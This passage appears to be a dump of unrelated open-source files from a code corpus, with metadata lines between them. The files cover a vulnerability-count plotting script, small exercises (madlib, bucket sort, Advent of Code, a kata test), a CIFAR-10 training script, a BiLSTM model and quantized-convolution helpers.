df5.columns=['name','not_vulnerable','vulnerable']
# print(df1)
df5 = df5[df5['vulnerable']!=0]
print(len(df5))
df5 = df5.drop_duplicates(subset=['name'])
print(len(df5))
# Combine all classes and sort packages by total version count so the
# stacked bars grow from left to right.
df = pd.concat([df1, df2,df3,df4,df5])
df = df[df['vulnerable']!=0]
print(len(df))
df['total']=df.loc[:,['not_vulnerable','vulnerable']].sum(axis=1)
df = df.sort_values(by=['total'])
# print(df)
import matplotlib.pyplot as plt
import seaborn as sns
#set seaborn plotting aesthetics
sns.set(style='white')
# fig, ax = plt.subplots()
# ax = df.set_index('name').plot(kind='bar', stacked=True)
# a=np.arange(0,len(df), 25)
# ax.set_xticks(a)
# ax.set_xticklabels(a)
# plt.legend(loc='upper left')
# plt.xlabel("Packages", labelpad=10)
# plt.ylabel("Number of versions", labelpad=10)
# # plt.ylim([0,100])
# plt.tight_layout()
# # plt.savefig("versions-surface.pdf")
# plt.show()
# df = pd.read_csv ('vuln-versions.csv')
# # print(df)
# #print(df[df.columns[1]])
# # Data
x=range(len(df))
# df[df.columns[2]] = df[df.columns[2]].replace(0,1)
# print(df)
diff = df['not_vulnerable']
# y=[ diff, df[df.columns[2]]]
# print(y)
import seaborn as sns
import matplotlib.pyplot as plt
sns.set()
sns.set_style("whitegrid")
sns.set_palette("Set2")
plt.rcParams["figure.figsize"] = (16, 5)
fig, ax = plt.subplots()
font_size = 30
legend_font_size = 24
# Stacked bars: unaffected versions on the bottom, affected on top.
ax.bar(x, df['not_vulnerable'], label='Not affected',edgecolor = "none")
ax.bar(x, df['vulnerable'], bottom=diff, label='Affected',edgecolor = "none")
plt.legend(loc='upper left')
plt.xlabel("Packages", labelpad=10)
# Tick every 30th package plus the last one; labels are 1-based.
a=np.arange(0,len(df),30)
a= np.append(a,[len(df)], axis=0)
# print(a)
ax.set_xticks(a)
b=np.arange(0,len(df),30)
b= np.append(b,[len(df)], axis=0)
b = np.delete(b, 0, 0)
b = np.insert(b, 0, 1)
ax.set_xticklabels(b)
ax.set_ylabel("Number of versions", fontsize=font_size, labelpad=20)
ax.set_xlabel("Packages", fontsize=font_size, labelpad=20)
ax.set_ylim(0,100)
ax.tick_params(axis='both', which='major')
ax.tick_params(axis='y', which='major', labelsize=legend_font_size)
ax.tick_params(axis='x', which='major', labelsize=legend_font_size, rotation=90)
ax.grid("both")
# plt.legend(bbox_to_anchor=(0,1.02,1,0.2), loc="lower left",
#            mode="expand", borderaxespad=0, ncol=2)
plt.setp(ax.get_legend().get_texts(), fontsize=font_size)
plt.subplots_adjust(top=0.91, right=0.99, bottom=.32)
plt.tight_layout()
# plt.savefig("versions-surface.pdf")
plt.show() | cristianstaicu/SecBench.js | analyses/graphs/versions-histogram.py | versions-histogram.py | py | 4,536 | python | en | code | 23 | github-code | 90 |
18187213413 | import unittest
from src.which_are_in import in_array
class TestWhichAreIn(unittest.TestCase):
    # in_array should return the sorted, de-duplicated entries of a1 that are
    # substrings of at least one entry of a2.
    def test_which_are_in(self):
        a1 = ["live", "arp", "strong"]
        a2 = ["lively", "alive", "harp", "sharp", "armstrong"]
        r = ['arp', 'live', 'strong']
        self.assertEqual(in_array(a1, a2), r)
if __name__ == '__main__':
    unittest.main()
| n1kk0/katas | python/test/test_which_are_in.py | test_which_are_in.py | py | 367 | python | en | code | 0 | github-code | 90 |
33573806441 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 12:56:03 2023
@author: zevfine
"""
def madlib(filename):
    '''reads a madlib and asks for the inputs'''
    # NOTE(review): the file handle is never closed -- prefer `with open(...)`.
    fn = open(filename,'r')
    txt = fn.read()
    word_list = txt.split(' ')
    print(word_list)
    for i in range(len(word_list)):
        word = word_list[i]
        if '(' in word:
            print(word)
            front = False  # NOTE(review): front/back are assigned but never used
            back = False
            if word[0] == '(':
                # Assumes the token is exactly "(placeholder)" -- a trailing
                # comma/period would leak into the prompt; TODO confirm inputs.
                part = word[1:-1]
                if '_' in part:
                    part = part.replace("_", ' ')
                if part[0] in 'aeiou':
                    replacment = str(input('Enter an ' + str(part) + ':'))
                else:
                    replacment = str(input('Enter a ' + str(part) + ':'))
                word_list[i] = replacment
    # BUG: joins the *builtin* `list`, which raises TypeError -- this should
    # be ' '.join(word_list).
    string = (' '.join(list))
    return string | ZevFine/Personal-Projects | madlibs.py | madlibs.py | py | 846 | python | en | code | 0 | github-code | 90
16470745930 | # Bucket Sort - O(n)
def bucket_sort(lst):
    """Return a sorted copy of *lst* using bucket sort.

    Values are spread across len(lst) buckets by magnitude, each bucket is
    sorted, and the buckets are concatenated.  Average O(n) when the values
    are uniformly distributed.  Assumes non-negative numbers (a negative
    value would compute a negative bucket index, as in the original).
    """
    # BUG FIX: the original raised on an empty list (max([]) is an error) and
    # divided by zero when every value was 0.
    if not lst:
        return []
    max_value = max(lst)
    if max_value == 0:
        return list(lst)
    bucket_size = max_value / len(lst)
    buckets = [[] for _ in range(len(lst))]
    # Put each element in its corresponding bucket.
    for num in lst:
        index = int(num / bucket_size)
        # The maximum value lands one slot past the end; clamp it in.
        if index >= len(buckets):
            index = len(buckets) - 1
        buckets[index].append(num)
    # sorted() (Timsort) replaces the hand-rolled insertion sort per bucket;
    # the resulting ordering is identical.
    for i in range(len(buckets)):
        buckets[i] = sorted(buckets[i])
    # Concatenate the sorted buckets.
    return [num for bucket in buckets for num in bucket]
def insertion_sort(lst):
    # Stable in-place insertion sort; returns the same list object.  O(n^2)
    # worst case, fast on the small/nearly-sorted buckets it is used for.
    # Traverse through all list elements
    for i in range(1, len(lst)):
        key = lst[i]
        j = i - 1
        # Move elements of the list greater than key to one position ahead of their current position
        while j >= 0 and key < lst[j]:
            lst[j + 1] = lst[j]
            j -= 1
        lst[j + 1] = key
    # Return the sorted list
    return lst | ItemHunt/Data-Structures-and-Algorithms | algorithms/sort/bucket_sort.py | bucket_sort.py | py | 1,111 | python | en | code | 0 | github-code | 90
21404773528 | import os
import pathlib
import re
import sys, getopt
import json
from tqdm import tqdm
def run(fname, max_len, min_word_num):
    """Extract "# text = " sentences from a CoNLL-U file into a JSON list.

    Sentences are cleaned/normalised by clean_string, grouped per document
    ("# newdoc id" markers), capped at max_len characters per document, and
    kept only when they have at least min_word_num words.  Output is written
    next to the input as <basename>.json.
    """
    inputFileName = fname
    outputFileName = fname.split('.')[0]+'.json' #+ '/out'
    #if not os.path.exists(pathout):
    #    os.makedirs(pathout)
    out_list=[]
    curr_string=""
    with open(inputFileName, "r") as in_file:
        with tqdm(in_file) as pbar:
            for line in pbar:
                if line[:11]=="# newdoc id":
                    # Flush the previous document before starting a new one.
                    if not curr_string=="":
                        out_list.append(curr_string.strip())
                        curr_string=""
                if line[:9]=="# text = ":
                    text = clean_string(line[9:])
                    if len(curr_string) + len(line) <= max_len and text.count(' ') >= min_word_num-1:
                        curr_string += text
    # NOTE(review): the final document is never appended here -- it is only
    # flushed when the *next* "# newdoc id" appears; verify this is intended.
    with open(outputFileName, "w") as out_file:
        jsonString = json.dumps(out_list,indent=2,ensure_ascii=False)
        out_file.write(jsonString)
def clean_string(s):
for c in s:
if not c in list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789.,?!();:-–—%\"'„”’… séáőúűíöüóÉÁŐÚŰÍÖÜÓ\n"):
#print(c, s)
return ""
return s.replace('„','"').replace('”','"').replace('’',"'").replace('…',"...").replace('–',"-").replace('—',"-")
def main(argv):
    """Parse -f <file> and -m <max_len> options, then invoke run().

    min_word_num is fixed at 2; -h prints usage and exits.
    """
    fname=""
    max_len=500
    min_word_num=2
    try:
        opts, args = getopt.getopt(argv,"hf:m:")
    except getopt.GetoptError:
        print('rename.py -f <fname> -m <max_len per doc>')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print('run_tests.py -f <fname> -m <max_len per doc>')
            sys.exit()
        elif opt in ("-f"):
            fname = arg
        elif opt in ("-m"):
            max_len = int(arg)
    run(fname,max_len,min_word_num)
if __name__ == "__main__":
main(sys.argv[1:]) | ntvuong/Diacritics_Vietnamese | webcorpus_2/get_text.py | get_text.py | py | 2,005 | python | en | code | 1 | github-code | 90 |
10726482272 | nums = [int(num.strip()) for num in open('aoc2019/inputs/1.txt').readlines()]
def calc_fuel(mass):
    """Fuel needed for one module: floor(mass / 3) - 2 (AoC 2019 day 1)."""
    return mass // 3 - 2


def rec_fuel(mass):
    """Total fuel for a module, counting the fuel needed to carry the fuel
    itself; contributions stop once a step requires zero or less."""
    total = 0
    step = calc_fuel(mass)
    while step > 0:
        total += step
        step = calc_fuel(step)
    return total
# Part 1: fuel for the modules alone.
total_fuel = sum([calc_fuel(mass) for mass in nums])
print(total_fuel)
# Part 2: include the fuel needed to carry the fuel.
total_rec_fuel = sum([rec_fuel(mass) for mass in nums])
print(total_rec_fuel)
| FjeldMats/AdventOfCode | aoc2019/day1.py | day1.py | py | 406 | python | en | code | 1 | github-code | 90 |
19797178484 | #!/usr/bin/python
# -*-coding:utf8-*-
"""
@author: LieOnMe
@time: 2019/7/27 17:07
"""
import os
import tensorflow as tf
from tensorflow import keras
from utils import conf
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
PROJ_PATH = conf.get_project_path()
def pre_process(x, y):
    """Per-sample preprocessing for tf.data: scale images, one-hot labels.

    x: uint8 image -- rescaled from [0, 255] to [-1, 1] floats.
    y: integer label -- squeezed (CIFAR labels arrive shaped (1,)) and
       one-hot encoded over 10 classes.
    """
    # [0-255] => [-1, 1]
    x = 2 * tf.cast(x, dtype=tf.float32) / 255 - 1.
    y = tf.cast(y, dtype=tf.int32)
    y = tf.squeeze(y)
    y = tf.one_hot(y, depth=10)
    return x, y
# Build the CIFAR-10 input pipelines.  data_path is only printed; the data
# itself comes from the keras dataset cache.
data_path = os.path.normpath(os.path.join(PROJ_PATH, 'data/cifar/cifar-10-python.tar.gz'))
print(data_path)
(x, y), (x_test, y_test) = keras.datasets.cifar10.load_data()
print(x.shape, y.shape)
print(x_test.shape, y_test.shape)
batch_size = 64
# Training pipeline: preprocess, shuffle, batch.
db = tf.data.Dataset.from_tensor_slices((x, y))
db = db.map(pre_process).shuffle(10000).batch(batch_size)
# Validation pipeline: no shuffling.
db_val = tf.data.Dataset.from_tensor_slices((x_test, y_test))
db_val = db_val.map(pre_process).batch(batch_size)
# Peek at one batch to sanity-check shapes.
db_iter = iter(db)
sample = next(db_iter)
print("Sample shape: ", sample[0].shape, sample[1].shape)
class MyDense(keras.layers.Layer):
    """Bias-free fully connected layer: output = inputs @ W."""

    def __init__(self, inp_dim, outp_dim):
        super(MyDense, self).__init__()
        # add_weight replaces the deprecated add_variable alias; the kernel is
        # created once here and tracked as a trainable variable of the layer.
        self.kernel = self.add_weight('w', [inp_dim, outp_dim])
        # self.bias = self.add_weight('b', [outp_dim])

    def call(self, inputs, **kwargs):
        # [batch, inp_dim] @ [inp_dim, outp_dim] -> [batch, outp_dim]
        out = inputs @ self.kernel
        return out

    def compute_output_signature(self, input_signature):
        pass
class MyNetwork(keras.Model):
    """Five-layer MLP classifier for CIFAR-10 built from MyDense layers:
    3072 -> 256 -> 128 -> 64 -> 32 -> 10 (logits)."""
    def __init__(self):
        super(MyNetwork, self).__init__()
        self.fc1 = MyDense(32 * 32 * 3, 256)
        self.fc2 = MyDense(256, 128)
        self.fc3 = MyDense(128, 64)
        self.fc4 = MyDense(64, 32)
        self.fc5 = MyDense(32, 10)
    def call(self, inputs, training=None, mask=None):
        """
        Flatten the image batch and run it through the MLP.

        :param inputs: [b, 32, 32, 3] image batch
        :param training: unused (no dropout/batch-norm in this model)
        :param mask: unused
        :return: [b, 10] class logits (softmax applied by the loss)
        """
        x = tf.reshape(inputs, [-1, 32 * 32 * 3])
        x = self.fc1(x)
        x = tf.nn.relu(x)
        x = self.fc2(x)
        x = tf.nn.relu(x)
        x = self.fc3(x)
        x = tf.nn.relu(x)
        x = self.fc4(x)
        x = tf.nn.relu(x)
        x = self.fc5(x)  # final layer stays linear: logits
        return x
    def compute_output_signature(self, input_signature):
        pass
# Train a fresh network for 15 epochs, validating after every epoch.
network = MyNetwork()
network.compile(keras.optimizers.Adam(lr=1e-3),
                loss=tf.losses.CategoricalCrossentropy(from_logits=True),
                metrics=['accuracy'])
network.fit(db, epochs=15, validation_data=db_val, validation_freq=1)
# Persist the weights, then delete the model to prove reloading works.
# NOTE(review): the '\\' separator makes this path Windows-specific.
weight_store_path = os.path.normpath(os.path.join(PROJ_PATH, 'out/cifar10')) + '\\weights.cpkt'
network.save_weights(weight_store_path)
del network
print('saved to weight.ckpt')
# Rebuild an identically-shaped model and restore the saved weights.
network = MyNetwork()
network.compile(keras.optimizers.Adam(lr=1e-3),
                loss=tf.losses.CategoricalCrossentropy(from_logits=True),
                metrics=['accuracy'])
network.load_weights(weight_store_path)
print('load weight')
network.evaluate(db_val) | kaisayi/bordercollie | src/model/cifar10_train.py | cifar10_train.py | py | 2,968 | python | en | code | 0 | github-code | 90 |
16744181813 | import numpy as np
import matplotlib.pyplot as plt
Data= np.genfromtxt('planetas.txt')
x = Data[:,0]
y = Data[:,1]
plt.plot(x,y)
plt.grid()
plt.savefig('Graph.png')
| SebastianSebz/SebastianSuarez_Ejercicio25 | graph.py | graph.py | py | 188 | python | en | code | 0 | github-code | 90 |
18378251989 | s=input()
# A string is "Bad" if any two adjacent characters are equal, else "Good".
# (`s` is read from stdin on the preceding line.)
if any(a == b for a, b in zip(s, s[1:])):
    print("Bad")
else:
    print("Good")
| Aasthaengg/IBMdataset | Python_codes/p02993/s104363473.py | s104363473.py | py | 144 | python | en | code | 0 | github-code | 90 |
7883566691 | from tensorflow.keras.models import Model
from tensorflow.keras.layers import Input, Conv2D, MaxPool2D, LSTM, Reshape, Dense, Dropout
from load_data import *
# Convolutional-recurrent classifier built on data from load_data's star
# import (sampled_data, labels, X_train/y_train, X_val/y_val).
# NOTE(review): assumes sampled_data is (samples, H, W, C) -- confirm in load_data.
batch_size = 1
inputs = Input(shape = (sampled_data.shape[1],sampled_data.shape[2],sampled_data.shape[3]), batch_size = batch_size)
# Two conv/pool/dropout stages extract local features and halve each spatial dim.
conv2d_1 = Conv2D(filters = 32, kernel_size = (3,3), strides = 1, padding = "same", activation='relu')(inputs)
conv2d_1 = MaxPool2D(pool_size = (2,2), padding = "same")(conv2d_1)
conv2d_1 = Dropout(.3)(conv2d_1)
conv2d_2 = Conv2D(filters = 64, kernel_size = (3,3), strides = 1, padding = "same", activation='relu')(conv2d_1)
conv2d_2 = MaxPool2D(pool_size = (2,2), padding = "same")(conv2d_2)
conv2d_2 = Dropout(.3)(conv2d_2)
# Reinterpret the pooled feature map as a 222-step sequence for the LSTM.
# NOTE(review): the hard-coded 222 must equal the pooled first dimension -- verify.
reshape = Reshape((222, -1))(conv2d_2)
lstm = LSTM(200, return_sequences = False)(reshape)
dense_1 = Dense(64, activation = "relu")(lstm)
dense_2 = Dense(32, activation = "relu")(dense_1)
# One softmax output per distinct label value.
outputs = Dense(len(set(labels)), activation = "softmax")(dense_2)
rcnn = Model(inputs, outputs)
# sparse_categorical_crossentropy: targets are integer class ids, not one-hot.
rcnn.compile(loss='sparse_categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
rcnn.summary()
rcnn.fit(X_train, y_train, epochs=10, batch_size=1, validation_data=(X_val, y_val)) | riyandrika/speech-recognition | RCNN.py | RCNN.py | py | 1,227 | python | en | code | 0 | github-code | 90 |
def check(n):
    """Return True iff n is odd and has exactly eight positive divisors."""
    # Even numbers and n <= 1 can never qualify; bail out before counting.
    if n <= 1 or n % 2 == 0:
        return False
    count = 0
    i = 1
    # Count divisors in pairs (i, n // i) up to sqrt(n): O(sqrt n) per call
    # instead of the original O(n) scan over every candidate.
    while i * i <= n:
        if n % i == 0:
            count += 1 if i * i == n else 2
        i += 1
    return count == 8
# Count how many integers in [1, n] satisfy check().
n = int(input())
print(sum(1 for i in range(1, n + 1) if check(i)))
| Aasthaengg/IBMdataset | Python_codes/p03281/s441326841.py | s441326841.py | py | 296 | python | en | code | 0 | github-code | 90 |
73246470376 | import torch.nn as nn
import torch
class Config:
    """Hyper-parameters and file paths for the BiLstm rumour classifier."""

    def __init__(self):
        # Assign every setting from one table so additions stay in one place.
        defaults = {
            'data_path': 'Pheme.csv',
            'batch_size': 64,
            'min_freq': 0,
            'pad_length': 80,
            'embedding_path': '../../Glove_Twitter_wordVec/glove.twitter.27B.200d.txt',
            'embed_size': 200,
            'num_hiddens': 128,
            'num_layers': 2,
            'num_classes': 2,
            'num_epochs': 10,
            'learning_rate': 1e-5,
            'saved_path': 'model2.ckpt',
        }
        for name, value in defaults.items():
            setattr(self, name, value)
'''
embedding:
Input: (vocab_size, embed_size), i.e., len(embeds), glove_vecs_dim
Output: (batch_size, padding_length, word_dims)
'''
class BiLstm(nn.Module):
    """Bidirectional LSTM text classifier.

    The decoder input is num_hiddens * 4 because the encoder is
    bidirectional (x2) and the first and last time-step outputs are
    concatenated (x2).
    """

    def __init__(self, vocab_size, embed_size, num_hiddens, num_layers, num_classes):
        super(BiLstm, self).__init__()
        self.embedding = nn.Embedding(vocab_size, embed_size)
        self.encoder = nn.LSTM(embed_size, num_hiddens,
                               num_layers=num_layers, bidirectional=True)
        self.decoder = nn.Linear(num_hiddens * 4, num_classes)

    def forward(self, x):
        # (batch, seq) -> (seq, batch, embed): the LSTM expects time-major input.
        tokens = self.embedding(x.T)
        # Compact the LSTM weights for faster access.
        self.encoder.flatten_parameters()
        states, _ = self.encoder(tokens)
        # Classify from the first and last time-step hidden states.
        first, last = states[0], states[-1]
        return self.decoder(torch.cat((first, last), dim=1))
def init_weights(m):
    """Xavier-initialize a module; intended for use with model.apply().

    Linear layers get xavier_normal_ weights; LSTM layers get
    xavier_uniform_ on every weight matrix (biases untouched).
    """
    # isinstance replaces the fragile `type(m) ==` checks and also covers
    # subclasses of Linear/LSTM.
    if isinstance(m, nn.Linear):
        nn.init.xavier_normal_(m.weight)
    elif isinstance(m, nn.LSTM):
        # named_parameters() is the public API; the original walked the
        # private _flat_weights_names/_parameters attributes.
        for name, param in m.named_parameters():
            if "weight" in name:
                nn.init.xavier_uniform_(param)
| andr2w/Malicious-Attack | TextFooler/model.py | model.py | py | 1,652 | python | en | code | 1 | github-code | 90 |
27984965602 | import numpy as np
import pdb
import torch.nn as nn
import torch
import time
from at5k_1.write_file import write_weight_b
def wr_str(str):  # parameter name kept for call compatibility (shadows builtin)
    """Append one line of text to the fixed model-description file.

    Uses a context manager so the handle is closed even if a write raises
    (the original opened and closed manually, leaking on exceptions).
    """
    with open('E:/AT5000/AT5K_Pytorch_2/Pytorch_Retinaface_master/at5k_1/model_txt/model.txt', 'a') as f:
        f.write(str)
        f.write('\n')
class cal_l:
    """Stateful counter that yields '//layer<N>' labels, N starting at *n*."""

    def __init__(self, n=1):
        self.n = n

    def __call__(self):
        # Emit the label for the current index, then advance the counter.
        # (The original also computed an unused next_idx local.)
        label = '//layer' + str(self.n)
        self.n += 1
        return label
def serializeWeight(data, Csize=8, Ksize=8):
    """Flatten a conv weight (F1, F2, C, N) or bias (N,) into the
    accelerator's tiled byte order.

    Output channels are processed in groups of Ksize and input channels in
    groups of Csize; partial groups are zero-padded so the hardware always
    reads full tiles.
    """
    result = []
    #
    # if data.shape[2] < Csize:
    #     temp = np.zeros((data.shape[0], data.shape[1], Csize, data.shape[3]))
    #     temp[:,:,0:data.shape[2],:] = data
    #     data = temp
    if len(data.shape) == 4:
        # for the conv weight
        F1, F2, C, N = data.shape
    elif len(data.shape) == 1:
        # for the conv bias
        # Biases are emitted directly, padded up to a multiple of Ksize.
        N = data.shape[0]
        result.extend(data)
        if N % Ksize:
            result.extend(np.zeros(Ksize - (N % Ksize), dtype=np.int8))
        return result
    else:
        print('Weight shape not correct')
        return None
    # flag marks the single-input-channel (depthwise-style) layout.
    flag = False
    if C ==1:
        # NOTE(review): permute() is not in-place and its result is discarded,
        # so this transpose appears to have no effect -- confirm intent.
        data.permute(0,1,3,2)
        F1, F2, C, N = data.shape
        flag = True
    Cleft = C
    Nleft = N
    Cidx = 0
    Nidx = 0
    CC = Csize
    # Outer loop: tiles of up to Ksize output channels.
    while Nleft > 0:
        if Nleft < Ksize:
            KK = Nleft
        else:
            KK = Ksize
        Cleft = C
        Cidx = 0
        # Inner loop: tiles of up to Csize input channels.
        while Cleft > 0:
            if Cleft > Csize:
                CC = Csize
            else:
                CC = Cleft
            # Emit every filter position for this (C-tile, K-tile) pair.
            for f1 in range(F1):
                for f2 in range(F2):
                    for k in range(KK):
                        # result.extend(np.int8(data[f1, f2, Cidx:Cidx + CC, k + Nidx]))
                        result.extend(data[f1, f2, Cidx:Cidx + CC, k + Nidx])
                        # print('offset:', f1, f2, Cidx, k+Nidx)
            # Pad partial channel tiles with zeros (skipped in the flag case).
            if flag == True:
                pass
            else:
                if CC < Csize:
                    result.extend(np.zeros(Csize - CC, dtype=np.int8))
            if (KK < Ksize):
                result.extend(np.zeros((Ksize - KK) * Csize, dtype=np.int8))
            Cleft -= Csize
            Cidx += CC
        Nleft = Nleft - Ksize
        Nidx += KK
    return result
# Module-level label generator shared by every cal_layer() call.
aaa = cal_l()


def cal_layer():
    """Append the next '//layer<N>' marker to the model description file."""
    wr_str(aaa())
def shift(M):
    """Return the largest power of two in [2**-31, 2**32] that is <= M.

    Returns None when M < 2**-31 (no representable shift exists).
    """
    for i in range(-32, 32):
        if M >= 2 ** (-i):
            return 2 ** (-i)
    # The original had an unreachable `break` after the return and fell
    # through implicitly; the no-match result is now explicit.
    return None
def add_scale(M):
    """Round the multiplier M to the nearest neighbouring power of two."""
    for i in range(-32, 32):
        lower = 2 ** (-i)
        if M >= lower:
            upper = 2 ** (-i + 1)
            # Pick whichever bracketing power of two is closer to M
            # (ties go to the lower one, matching the original comparison).
            return upper if abs(M - lower) > abs(M - upper) else lower
def _pow2_or_shift_sum(M, pow2):
    """Pick between the single power of two *pow2* and a three-term
    shift-sum approximation of M; return [value, used_shift_sum].

    This is the body of the two ~20-line branches the original duplicated
    verbatim for the upper and lower neighbouring powers of two.
    """
    thre = 0.1
    if np.abs(pow2 - M) / M > thre:
        # The single power is off by more than 10%: try summing the three
        # largest power-of-two components of M instead.
        aaa1 = shift(M)
        aaa2 = shift(M - aaa1)
        aaa3 = shift(M - aaa1 - aaa2)
        approx = aaa1 + aaa2 + aaa3
        # Keep whichever candidate has the smaller absolute error.
        if np.abs(M - approx) > np.abs(M - pow2):
            return [pow2, False]
        return [approx, True]
    return [pow2, False]


def M2scale(M):
    """Approximate the requantization multiplier M by either a power of two
    or a sum of three power-of-two shifts.

    Returns [approximation, is_shift_sum]; returns None when M < 2**-31
    (no bracketing power of two found), matching the original fall-through.
    """
    for i in range(-32, 32):
        if M >= 2 ** (-i):
            lower = 2 ** (-i)
            upper = 2 ** (-i + 1)
            # Start from whichever neighbouring power of two is closer
            # (ties go to the lower one, as in the original comparison).
            nearest = upper if np.abs(M - lower) > np.abs(M - upper) else lower
            return _pow2_or_shift_sum(M, nearest)
def M2scale_TSME(M):
    """Split the multiplier M into a power-of-two shift and a 6-bit CPU
    multiplier: M ~= 2**(exp-1) * cpu2 / 2**6.

    Returns (right_shift_amount, power_of_two, cpu2); implicitly returns
    None when no exponent in [-32, 0) brackets M.
    """
    for exp in range(-32, 0):
        if M <= 2 ** exp:
            half = 2 ** (exp - 1)
            cpu2 = np.floor((M / half) * 2 ** 6)
            print(exp - 1, half, cpu2)
            return -(exp - 1), half, cpu2
def conv_jit(input, weight_int, bias_float, weight, bias, self_M, inp, oup, stride, padding, groups, scale, zp):
    """Simulate a quantized 3x3 conv both in integer and float arithmetic.

    res1: hardware-style path -- integer input (zero-point removed) through a
    conv with integer weights, rescaled by self_M, floored, clipped to int8.
    res2: reference path -- dequantized float input/weights through the same
    conv shape. Both are returned re-quantized to qint8 with (scale, zp).

    NOTE(review): `input` and `weight_int` are assumed to be torch quantized
    tensors (they expose int_repr()/q_scale()/q_zero_point()); `weight`/`bias`
    their integer representations -- confirm against callers.
    """
    # --- integer path ----------------------------------------------------
    aaa = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
    aaa.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
    #aaa.bias = torch.nn.Parameter(torch.zeros_like(torch.tensor(np.array(bias).astype(np.float32))))
    #aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
    aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
    # Remove the input zero-point so the conv sees centred integer values.
    input_ = np.array(input.int_repr()*1.0).astype(np.float32) - np.array(input.q_zero_point()).astype(np.float32)
    res = aaa( torch.tensor(input_))
    res = res.detach().numpy()
    M = M2scale(self_M)
    #if ( (self_M - M[0])/self_M) > 0.1:
    #    pdb.set_trace()
    #print('##################', M[0], self_M, (self_M - M[0])/self_M, (self_M - M[0])/M[0] )
    #if M[1]:
    #    print('$$$$$$$$$$$$$ counting $$$$$$$$$$$$$$')
    #res = res * M[0]
    # Requantize: scale by the exact multiplier, floor, re-add the output
    # zero-point, clamp to the int8 range.
    res = res * self_M
    res = np.floor(res)
    res = res + zp # add ly
    #res[res>120] = 0
    res = np.floor(np.clip(res, -128, 127))
    # Align to the quantized-tensor format expected downstream.
    res = res.astype(np.float32)
    res = torch.tensor(scale * (res - zp))
    res1 = torch.quantize_per_tensor(res ,scale = scale , zero_point = zp, dtype = torch.qint8)
    # float
    # --- float reference path --------------------------------------------
    aaa = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
    input_ = (np.array(input.int_repr()).astype(np.float32) - input.q_zero_point())*input.q_scale()
    weight_ = (np.array(weight_int.int_repr()).astype(np.float32)- weight_int.q_zero_point()).astype(np.float32) * weight_int.q_scale()
    aaa.weight = torch.nn.Parameter(torch.tensor(np.array(weight_)))
    #aaa.bias = torch.nn.Parameter(torch.zeros_like(torch.tensor(np.array(bias_float))))
    aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias_float)))
    res = aaa(torch.tensor(input_))
    res = res.detach().numpy()
    # Align to the quantized-tensor format.
    res = torch.tensor(res)
    res2 = torch.quantize_per_tensor(res, scale = scale , zero_point = zp, dtype = torch.qint8)
    #finish
    # err is computed for debugging only; it is not returned.
    err = (np.array(res1.int_repr()).astype(np.float32) - np.array(res2.int_repr()).astype(np.float32)).max()
    #err1 = (ori - np.array(res2.int_repr()).astype(np.float32) ).max()
    return res1, res2
def conv_jit2(input, weight_int, bias_float, weight, bias, self_M, inp, oup, stride, padding, groups, scale, zp):
    """Hardware-accurate integer simulation of a quantized 3x3 conv layer.

    Runs the conv on centred and uncentred integer inputs to derive a
    per-channel bias correction (`diff`) that folds the input zero-point
    into the bias, then requantizes via the two-stage shift + 6-bit CPU
    multiplier from M2scale_TSME. Every tensor and quantization parameter
    is dumped to ./layer_output_time/ and the serialized weights are
    written via write_weight_b. The fused-bias qint8 result (res_d) is
    produced for return by the caller-visible tail.

    NOTE(review): `input`/`weight_int` are assumed to be torch quantized
    tensors and `weight`/`bias` their integer representations -- confirm.
    """
    # Reference conv on zero-point-centred integer input.
    aaa = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
    aaa.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
    aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
    input_ = np.array(input.int_repr()*1.0).astype(np.float32) - np.array(input.q_zero_point()).astype(np.float32)
    res = aaa( torch.tensor(input_))
    # Same conv on the raw (uncentred) integers; the difference isolates the
    # contribution of the input zero-point per output channel.
    bbb = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
    bbb.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
    # aaa.bias = torch.nn.Parameter(torch.zeros_like(torch.tensor(np.array(bias).astype(np.float32))))
    # aaa.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
    bbb.bias = torch.nn.Parameter(torch.tensor(np.array(bias).astype(np.float32)))
    input_ = np.array(input.int_repr() * 1.0).astype(np.float32)# - np.array(input.q_zero_point()).astype(np.float32)
    # input_ = np.array(input.int_repr() ).astype(np.float32)
    res_b = bbb(torch.tensor(input_))
    diff = res.detach().numpy() - res_b.detach().numpy()
    '''
    #res是直接的卷积输出,res_b是 input和weight的卷积
    ccc = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
    ccc.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
    ccc.bias = torch.nn.Parameter(torch.tensor(np.array(bias+diff[0,:,10,10]).astype(np.float32)))
    input_ = np.array(input.int_repr()*1.0).astype(np.float32) # - np.array(input.q_zero_point()).astype(np.float32)
    #input_ = np.array(input.int_repr() ).astype(np.float32)
    res_c = ccc( torch.tensor(input_))
    '''
    # Hardware-style conv: raw integer input with the zero-point correction
    # and output zero-point pre-compensation (zp / self_M) folded into the bias.
    # NOTE(review): diff[0,:,3,3] samples the correction at one spatial
    # position -- valid only if the correction is spatially constant (interior
    # pixels); confirm for padded borders.
    ddd = nn.Conv2d(inp, oup, 3, stride, padding, groups=groups, bias=True)
    ddd.weight = torch.nn.Parameter(torch.tensor(np.array(weight).astype(np.float32)))
    ddd.bias = torch.nn.Parameter(torch.tensor(np.array(np.floor(bias+diff[0,:,3,3]+zp/self_M)).astype(np.float32))) #
    input_ = np.array(input.int_repr()*1.0).astype(np.float32)
    res_d = ddd( torch.tensor(input_))
    res_d = res_d.detach().numpy()
    # Two-stage requantization: power-of-two shift then 6-bit CPU multiplier.
